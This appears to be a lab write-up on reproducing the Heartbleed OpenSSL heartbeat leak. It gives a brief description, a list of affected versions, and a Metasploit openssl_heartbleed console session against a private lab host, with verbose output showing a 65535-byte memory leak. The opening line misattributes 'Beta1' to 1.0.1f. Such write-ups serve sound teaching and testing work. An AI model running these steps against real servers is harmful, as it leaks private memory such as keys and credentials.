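Vulnerability description
On April 7, 2014, OpenSSL published a security advisory: a vulnerability exists in OpenSSL 1.0.1 through OpenSSL 1.0.1f Beta1. Its Chinese name is 心脏滴血 and its English name is HeartBleed. "Heart" refers to the fact that the vulnerability is in the heartbeat protocol, and "Bleed" to the data leak it causes. In other words, HeartBleed is a data-leak vulnerability in the heartbeat protocol, which the OpenSSL library uses. HeartBleed mainly affects OpenSSL versions 1.0.1 through 1.0.1f.
Affected versions
OpenSSL 1.0.1, 1.0.1a, 1.0.1b, 1.0.1c, 1.0.1d, 1.0.1e, 1.0.1f, Beta 1 of OpenSSL 1.0.2, and similar versions
Reproducing the vulnerability
Use the Nmap detection script to check the target.

Once the Heartbleed vulnerability is detected, use MSF to attack the target: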
```
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until key dump status
   THREADS           1                yes       The number of concurrent threads (max one per host)
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)

Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 192.168.51.133
rhost => 192.168.51.133
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 192.168.51.133:443 - Leaking heartbeat response #1
[*] 192.168.51.133:443 - Sending Client Hello...
[*] 192.168.51.133:443 - SSL record #1:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 86
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 82
[*] 192.168.51.133:443 - Type: Server Hello (2)
[*] 192.168.51.133:443 - Server Hello Version: 0x0301
[*] 192.168.51.133:443 - Server Hello random data: 5fd46996727a4e50c0e2eaecf52d1592384aaa6870d4d65eea8b6b34eb47a389
[*] 192.168.51.133:443 - Server Hello Session ID length: 32
[*] 192.168.51.133:443 - Server Hello Session ID: 66e9cacbefcb28955de31c38bd9dff93de153a6d6247fa117ebc3f2f091d6f74
[*] 192.168.51.133:443 - SSL record #2:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 822
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 818
[*] 192.168.51.133:443 - Type: Certificate Data (11)
[*] 192.168.51.133:443 - Certificates length: 815
[*] 192.168.51.133:443 - Data length: 818
[*] 192.168.51.133:443 - Certificate #1:
[*] 192.168.51.133:443 - Certificate #1: Length: 812
[*] 192.168.51.133:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, issuer=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, serial=#<OpenSSL::BN:0x00007efe8154c028>, not_before=2020-08-09 17:03:46 UTC, not_after=2021-08-09 17:03:46 UTC>
[*] 192.168.51.133:443 - SSL record #3:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 331
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 327
[*] 192.168.51.133:443 - Type: Server Key Exchange (12)
[*] 192.168.51.133:443 - SSL record #4:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 4
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 0
[*] 192.168.51.133:443 - Type: Server Hello Done (14)
[*] 192.168.51.133:443 - Sending Heartbeat...
[*] 192.168.51.133:443 - Heartbeat response, 65535 bytes
[+] 192.168.51.133:443 - Heartbeat response with leak, 65535 bytes
[*] 192.168.51.133:443 - Printable info leaked:
[*] 192.168.51.133:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

